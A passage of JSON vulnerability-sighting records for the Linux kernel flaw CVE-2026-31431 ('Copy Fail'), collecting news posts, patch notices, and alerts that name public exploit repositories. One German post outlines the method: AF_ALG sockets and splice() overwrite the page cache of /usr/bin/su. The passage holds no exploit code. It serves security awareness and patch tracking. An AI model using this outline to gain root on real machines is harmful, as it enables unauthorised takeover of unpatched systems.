"cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ikkeT.mementomori.social.ap.brid.gy/post/3ml3j7no2ds62", "content": "Red Hat product updates to copy fail available https://access.redhat.com/security/cve/cve-2026-31431\n\n#cve202631431 #CopyFail", "creation_timestamp": "2026-05-05T06:03:27.899508Z"}, {"uuid": "a941cb04-56df-4223-8699-703c2b80511d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hackernewsrobot.bsky.social/post/3ml3ky76ax42y", "content": "CVE-2026-31431: Copy Fail vs. rootless containers", "creation_timestamp": "2026-05-05T06:34:14.564667Z"}, {"uuid": "3a5f4047-24a8-47b7-90fa-847224e4428e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/novalfaiq/9d01ab62f9c504321c5bebaf90d2fcab", "content": "", "creation_timestamp": "2026-05-05T01:46:52.000000Z"}, {"uuid": "283cedf4-198e-4e8f-b87a-08125c7856d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82837", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-Copy-Fail\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a rippsec\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 1  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-05 00:47:33\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-05T01:00:04.000000Z"}, {"uuid": "dfeac0d1-be30-4514-aafb-5ecf92216094", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/news.karthihegde.dev/post/3ml3c4k7d4v2t", "content": "CVE-2026-31431: Copy Fail vs. rootless containers\nDiscussion | hackernews | Author: averi", "creation_timestamp": "2026-05-05T03:55:39.111120Z"}, {"uuid": "f53138bc-360e-44d9-b91a-47a26a442d90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/iLUe8v0Uh0Sb6iiHrVVi_18OGPn_eI_21UJtbxqFwUVI_uE", "content": "", "creation_timestamp": "2026-05-05T03:00:05.000000Z"}, {"uuid": "a11a3aad-d765-40ba-9b96-663f6b461647", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hnws.bsky.social/post/3ml3c4mjmcr2t", "content": "CVE-2026-31431: Copy Fail vs. rootless containers\ncomments \u00b7 posted on 2026.05.04 at 23:43:08 (c=0, p=5)", "creation_timestamp": "2026-05-05T03:55:40.606098Z"}, {"uuid": "44e30d85-1018-453a-9ca5-e9d602e7fa97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/opsmatters.com/post/3ml34u76hg72r", "content": "The latest update for #SafeBreach includes \"'Copy Fail' Vulnerability (CVE-2026-31431): #Linux Kernel Privilege Escalation\" and \"Introducing SafeBreach Helm\".\n \n#Cybersecurity https://opsmtrs.com/41NWGuQ", "creation_timestamp": "2026-05-05T02:21:27.957005Z"}, {"uuid": "8749263d-ebc7-4d3e-b481-fb2b01e020b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/rPnY3cDOMvKcPFRcx6QsxUGiZwWHKwUb91xptawBtUQTSW0", "content": "", "creation_timestamp": "2026-05-04T21:00:04.000000Z"}, {"uuid": "1e9dd049-9ebc-4dee-8c03-3bc26d84ac72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3ml35daxrws2s", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 540 interactions\nCVE-2026-41940: 82 interactions\nCVE-2026-3854: 57 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-31431: 59 interactions\nCVE-2026-41940: 8 interactions\nCVE-2026-22679: 5 interactions\n", "creation_timestamp": "2026-05-05T02:29:52.980545Z"}, {"uuid": "80ca80d5-44c2-4923-ae06-ebfddbcc331a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/0_HRy55XY1gHFnZjznakOF7ZoOcpEYzc0dvtDC6c94sHEnY", "content": "", "creation_timestamp": "2026-05-04T15:00:07.000000Z"}, {"uuid": "7b18b925-adf0-48b4-9b0c-9436236f4a6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hackernewsbot.bsky.social/post/3ml3cejzjvv2r", "content": "CVE-2026-31431: Copy Fail vs. rootless containers | Discussion", "creation_timestamp": "2026-05-05T04:00:04.906235Z"}, {"uuid": "3094207f-21de-419c-9377-4fefbdf78de8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/XcvE3DqJ3gfHbHlWBgCF8vzzdw-S4AP1Zm_7A_yYzHhyXEw", "content": "", "creation_timestamp": "2026-05-04T09:00:04.000000Z"}, {"uuid": "eeb366fa-1cff-4b5b-9888-2da439d3ade9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hnbot.gsuscs.xyz/post/3ml3cf7ds622l", "content": "CVE-2026-31431: Copy Fail vs. rootless containers\n\nhttps://www.dragonsreach.it/2026/05/04/cve-2026-31431-copy-fail-rootless-containers/", "creation_timestamp": "2026-05-05T04:00:28.051988Z"}, {"uuid": "691c5003-0f5e-49a3-ab96-de8cdad19e93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hackernewstop5.bsky.social/post/3ml3ck4uxpv25", "content": "CVE-2026-31431: Copy Fail vs. rootless containers\n\n#HackerNews\n\nhttps://www.dragonsreach.it/2026/05/04/cve-2026-31431-copy-fail-rootless-containers/", "creation_timestamp": "2026-05-05T04:03:12.555934Z"}, {"uuid": "81ce4449-c496-4d23-b8a7-7960d93cabe9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/betterhn20.e-work.xyz/post/3ml3f7a73fr2a", "content": "CVE-2026-31431: Copy Fail vs. rootless containers https://www.dragonsreach.it/2026/05/04/cve-2026-31431-copy-fail-rootless-containers/ (https://news.ycombinator.com/item?id=48017813)", "creation_timestamp": "2026-05-05T04:50:48.203979Z"}, {"uuid": "e878ab76-6b9c-4b3d-9c4b-b29f01d8f19a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/xOE6u0S4AhmTrHPBDYscPzMv6FpE3fbyPNbn5dJYZfuDoSw", "content": "", "creation_timestamp": "2026-05-04T03:00:05.000000Z"}, {"uuid": "7491549c-eff4-495b-87bb-2427c53674e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/getpacketai.bsky.social/post/3ml3mgvclvd2c", "content": "CISA flags critical Linux privilege escalation bug under active attack. CVE-2026-31431 now on the KEV list\u2014patch your systems immediately.\n\nhttps://thehackernews.com/2026/05/cisa-adds-actively-exploited-linux-root.html\n\n#cybersecurity #infosec", "creation_timestamp": "2026-05-05T07:00:24.772812Z"}, {"uuid": "d93e97ee-07f4-491e-9352-31e24efb70eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/kompetenztraining.bsky.social/post/3ml3n2bv73e27", "content": "Wir hatten lange kein sch\u00f6nes Linux Local Privilege Escalation mehr, oder? CVE-2026-31431 kombiniert AF_ALG-Sockets mit splice(), um beliebige Daten in den Page Cache von Systembinaries zu schreiben \u2014 konkret /usr/bin/su. Kernel < 6.19.12 betroffen, gesamte 6.17.x-Linie ungepatcht.", "creation_timestamp": "2026-05-05T07:11:11.914328Z"}, {"uuid": "f1cea772-db3a-441d-89aa-36ec1cdd8401", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/basefortify.bsky.social/post/3ml3qmxu3bk2t", "content": "\ud83d\udea8 What if a Linux exploit never touched disk?\n\nCopy Fail (CVE-2026-31431) lets attackers become root by corrupting the page cache in memory.\n\nNo file changes  \nNo integrity alerts  \nHarder to detect\n\nCVSS 7.8 (High)\n\n\ud83d\udc49 basefortify.eu/posts/2026/0... \n\n#Linux #CyberSecurity #CopyFail", "creation_timestamp": "2026-05-05T08:15:28.544366Z"}, {"uuid": "4411e3e7-5f2d-4894-a1a4-faceab439d74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/basefortify.bsky.social/post/3ml3qmzggm22t", "content": "\ud83d\udea8 What if a Linux exploit never touched disk?\n\nCopy Fail (CVE-2026-31431) lets attackers become root by corrupting the page cache in memory.\n\nNo file changes  \nNo integrity alerts  \nHarder to detect\n\nCVSS 7.8 (High)\n\n\ud83d\udc49 basefortify.eu/posts/2026/0... \n\n#Linux #CyberSecurity #CopyFail", "creation_timestamp": "2026-05-05T08:15:29.187832Z"}, {"uuid": "13135932-442e-4f54-905d-21fbd8d94ef5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/basefortify.bsky.social/post/3ml3qn4uwqc2t", "content": "\ud83d\udea8 What if a Linux exploit never touched disk?\n\nCopy Fail (CVE-2026-31431) lets attackers become root by corrupting the page cache in memory.\n\nNo file changes  \nNo integrity alerts  \nHarder to detect\n\nCVSS 7.8 (High)\n\n\ud83d\udc49 basefortify.eu/posts/2026/0... \n\n#Linux #CyberSecurity #CopyFail", "creation_timestamp": "2026-05-05T08:15:29.697939Z"}, {"uuid": "86eb20f6-3f3c-4c1e-ba63-e67aea1d5ea1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pixelsandpulse.bsky.social/post/3ml3qz3qfqc2h", "content": "A severe Linux kernel vulnerability, CVE-2026-31431 \"Copy Fail,\" lets attackers corrupt in-memory binaries for privilege escalation. We break down how it works and why rootless containers like Podman offer a vital layer of\u2026\n\nhttps://www.tpp.blog/1ip7iqt\n\n#cybersecurity #cve202631431 #copyfail", "creation_timestamp": "2026-05-05T08:22:07.197164Z"}, {"uuid": "38785b4f-0ce4-4901-9ba9-bad0b984b139", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/jfstenuit/7a90b1d6d1116863693907e6e1cd3de4", "content": "", "creation_timestamp": "2026-05-05T08:20:03.000000Z"}, {"uuid": "3be76bd2-0792-40bd-883d-1bf01da2ab83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Ubuntu.activitypub.awakari.com.ap.brid.gy/post/3ml3rcn3kbgy2", "content": "CopyFail sur Linux : les patchs de s\u00e9curit\u00e9 sont-ils disponibles ? Les patchs pour la CVE-2026-31431, alias CopyFail, sont-ils disponibles pour les distributions Linux : Debian, Ubuntu, RHEL, etc...\n\n#Actu #Cybers\u00e9curit\u00e9 #Cybers\u00e9curit\u00e9 #Linux\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-05T08:27:30.777934Z"}, {"uuid": "6b269345-28a0-43f6-83ee-c84af4795290", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/annabzz.bsky.social/post/3ml3rlii7n22z", "content": "CVE-2026-31431?", "creation_timestamp": "2026-05-05T08:32:24.775674Z"}, {"uuid": "3896911e-2c50-480b-9d68-670b3acf3191", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://gist.github.com/acalatrava/a632d8e224ce05db8a30be1d4e2dd69a", "content": "", "creation_timestamp": "2026-05-05T08:38:55.000000Z"}, {"uuid": "bd979fc0-a3f7-4a85-94cb-37332f426a90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82871", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copyfail-exploit\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a xeloxa\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 2  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-05 06:58:46\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCopy Fail (CVE-2026-31431) LPE exploit. A clean, multi-arch Python reimplementation targeting the Linux kernel AF_ALG page cache vulnerability.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-05T07:00:05.000000Z"}, {"uuid": "0c1c3d0e-c63a-4a08-ad90-bbdb546f61b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82877", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a mitigate-copy-fail.yml\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a deadRabbit92\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-05 07:57:21\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nMitigates CVE-2026-31431 (Copy Fail) by unloading and blacklisting algif_aead kernel module if it is loadable and has no active references.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-05T08:00:05.000000Z"}, {"uuid": "203376a8-750c-43b0-af70-900e2597cadc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/probbrain.bsky.social/post/3ml3uyvu37222", "content": "CVE-2026-31431: Copy Fail vs. rootless containers", "creation_timestamp": "2026-05-05T09:33:35.545167Z"}, {"uuid": "b98fd415-329e-42b1-9800-e2d2707051fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://gist.github.com/SagaieNet/68a2d3a5ef28966ab7f6dbe83a6a0dd0", "content": "", "creation_timestamp": "2026-05-05T07:16:48.000000Z"}, {"uuid": "aba2168d-5538-45e0-b291-8ed30cb50c7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://gist.github.com/SagaieNet/a7ac63874bd4ab1636c8ff56d9ebfde4", "content": "", "creation_timestamp": "2026-05-05T07:21:20.000000Z"}, {"uuid": "6fbb47a4-43a7-4dba-94d8-01bb1b603d86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/newsycombinatorbot.bsky.social/post/3ml3owv3i6f27", "content": "CVE-2026-31431: Copy Fail vs. rootless containers (www.dragonsreach.it)\n\nDiscussion | Main Link", "creation_timestamp": "2026-05-05T07:45:05.207560Z"}, {"uuid": "f33ced5b-bcb6-4c69-b44d-997e095e5154", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/sagalinked.bsky.social/post/3ml3fnq4blf23", "content": "\ud83d\udcf0 CVE-2026-31431: Copy Fail vs. rootless containers\n\n\ud83d\udd17 https://www.dragonsreach.it/2026/05/04/cve-2026-31431-copy-fail-rootless-containers/\n\n#Tech #Dev", "creation_timestamp": "2026-05-05T04:58:54.707744Z"}, {"uuid": "f842134f-c2c0-4e98-89d0-d69836e6eb7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/camorabug.com/post/3ml3vhxu7eb2v", "content": "Microsoft warns of high-severity Linux privilege escalation\u00a0flaw\n\nA new Microsoft warning says Copy Fail could increase risks for Kubernetes, CI/CD, and shared Linux workloads. Microsoft Defender has warned that CVE-2026-31431, also known as \u2018Copy Fail\u2018, is a high-severity local privilege\u2026", "creation_timestamp": "2026-05-05T09:42:01.425566Z"}, {"uuid": "cf9ac821-c976-4e5f-85e7-1f2c034cd574", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hn100.atproto.rocks/post/3ml3vnz7zbm2n", "content": "CVE-2026-31431: Copy Fail vs. rootless containers\nhttps://www.dragonsreach.it/2026/05/04/cve-2026-31431-copy-fail-rootless-containers/\n\nhttps://news.ycombinator.com/item?id=48017813", "creation_timestamp": "2026-05-05T09:45:23.814588Z"}, {"uuid": "b7971cfc-be54-415f-b0cb-431d1a391e52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/betterhn50.e-work.xyz/post/3ml3hyutibb26", "content": "CVE-2026-31431: Copy Fail vs. rootless containers https://www.dragonsreach.it/2026/05/04/cve-2026-31431-copy-fail-rootless-containers/ (https://news.ycombinator.com/item?id=48017813)", "creation_timestamp": "2026-05-05T05:40:56.005186Z"}, {"uuid": "a75498f0-1844-4ec2-8c3d-112ade4982e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pixelhead.bsky.social/post/3ml3zi47fz22h", "content": "Wegen diesem Copy Fail Bug CVE-2026-31431 bei #linux ... ich wei\u00df jetzt immer noch nicht, ob oder wie sehr das Smartphones oder Tablets mit Android betrifft.\nIch habe mal auf meknem Linuxrechner nach meiner Kernel Baureihe nachgeschaut (im Changelog) und da ist noch kein Fix dabei. \n#copyfail", "creation_timestamp": "2026-05-05T10:53:40.759470Z"}, {"uuid": "b25d054d-212c-4401-b79f-e5aef0e38dda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hn-frontpage-bot.bsky.social/post/3ml3x4xy32p2v", "content": "A vulnerability (CVE-2026-31431) allowed privilege escalation within a rootless container by corrupting the page cache of /usr/bin/su. However, User Namespace UID mapping prevented the escalation from affecting the host system, demonstrating the effectiveness of rootless container architecture.", "creation_timestamp": "2026-05-05T10:11:39.587750Z"}, {"uuid": "8b806e28-a77e-4fe6-b3ec-018146a8bdaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/albertvalo.itch.io/post/3ml43vkcchk2f", "content": "vale aviam. Resulta que s'ha descobert una vulnerabilitat en el kernel anonemada Copy Fail, o CVE-2026-31431, la cual dona acc\u00e9s privilegiat (root) a qualsevol usuario sense aquests privilegis. Aix\u00f2 es un problema perqu\u00e8 imagina que un script de python solicita aquests privilegis aprofitant-se", "creation_timestamp": "2026-05-05T11:37:01.730042Z"}, {"uuid": "2e233c0f-1eda-4b4f-baa5-1c137ca83280", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/camorabug.com/post/3ml3xig5ipk2t", "content": "Microsoft warns of high-severity Linux privilege escalation\u00a0flaw\n\nA new Microsoft warning says Copy Fail could increase risks for Kubernetes, CI/CD, and shared Linux workloads. Microsoft Defender has warned that CVE-2026-31431, also known as \u2018Copy Fail\u2018, is a high-severity local privilege\u2026", "creation_timestamp": "2026-05-05T10:18:03.520033Z"}, {"uuid": "88b1fdcb-921c-47dd-88d8-e4c2ecc5ec19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/albertvalo.itch.io/post/3ml43vkcgek2f", "content": "vale aviam. Resulta que s'ha descobert una vulnerabilitat en el kernel anonemada Copy Fail, o CVE-2026-31431, la cual dona acc\u00e9s privilegiat (root) a qualsevol usuario sense aquests privilegis. Aix\u00f2 es un problema perqu\u00e8 imagina que un script de python solicita aquests privilegis aprofitant-se", "creation_timestamp": "2026-05-05T11:37:04.184085Z"}, {"uuid": "0483070e-3923-4215-9d42-2c032f23eaf0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/albertvalo.itch.io/post/3ml43vkchds2f", "content": "vale aviam. Resulta que s'ha descobert una vulnerabilitat en el kernel anonemada Copy Fail, o CVE-2026-31431, la cual dona acc\u00e9s privilegiat (root) a qualsevol usuario sense aquests privilegis. Aix\u00f2 es un problema perqu\u00e8 imagina que un script de python solicita aquests privilegis aprofitant-se", "creation_timestamp": "2026-05-05T11:37:11.182473Z"}, {"uuid": "1e44f5ba-a74c-4c44-9fcd-ec704e31afb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/albertvalo.itch.io/post/3ml43vkrgtk2f", "content": "vale aviam. Resulta que s'ha descobert una vulnerabilitat en el kernel anonemada Copy Fail, o CVE-2026-31431, la cual dona acc\u00e9s privilegiat (root) a qualsevol usuario sense aquests privilegis. Aix\u00f2 es un problema perqu\u00e8 imagina que un script de python solicita aquests privilegis aprofitant-se", "creation_timestamp": "2026-05-05T11:37:11.897142Z"}, {"uuid": "acf74f11-8c58-41d3-8caf-cfb27bee6f50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/albertvalo.itch.io/post/3ml43vkrjrc2f", "content": "vale aviam. Resulta que s'ha descobert una vulnerabilitat en el kernel anonemada Copy Fail, o CVE-2026-31431, la cual dona acc\u00e9s privilegiat (root) a qualsevol usuario sense aquests privilegis. Aix\u00f2 es un problema perqu\u00e8 imagina que un script de python solicita aquests privilegis aprofitant-se", "creation_timestamp": "2026-05-05T11:37:22.053068Z"}, {"uuid": "355766e2-ae56-48aa-ad57-090b9206bf92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/habr_com_news/46251", "content": "\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u041d\u0422\u0426 \u0418\u0422 \u00ab\u0420\u043e\u0441\u0430\u00bb \u0437\u0430\u044f\u0432\u0438\u043b\u0430, \u0447\u0442\u043e \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2026-31431, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0435\u0439 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 Copy Fail. \u041a\u0430\u043a \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u043b\u0443\u0436\u0431\u0435 \u0425\u0430\u0431\u0440\u0430 \u0432 \u043f\u0440\u0435\u0441\u0441\u2011\u0441\u043b\u0443\u0436\u0431\u0435 \u041d\u0422\u0426 \u0418\u0422 \u00ab\u0420\u043e\u0441\u0430\u00bb, \u0432 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0439 \u043a\u0430\u0440\u0442\u043e\u0447\u043a\u0435 ROSA Bugzilla \u043f\u043e \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u043a\u0430\u0437\u0430\u043d \u0441\u0442\u0430\u0442\u0443\u0441 RESOLVED FIXED. \u0422\u0430\u043c \u0436\u0435 \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u044b \u0441\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 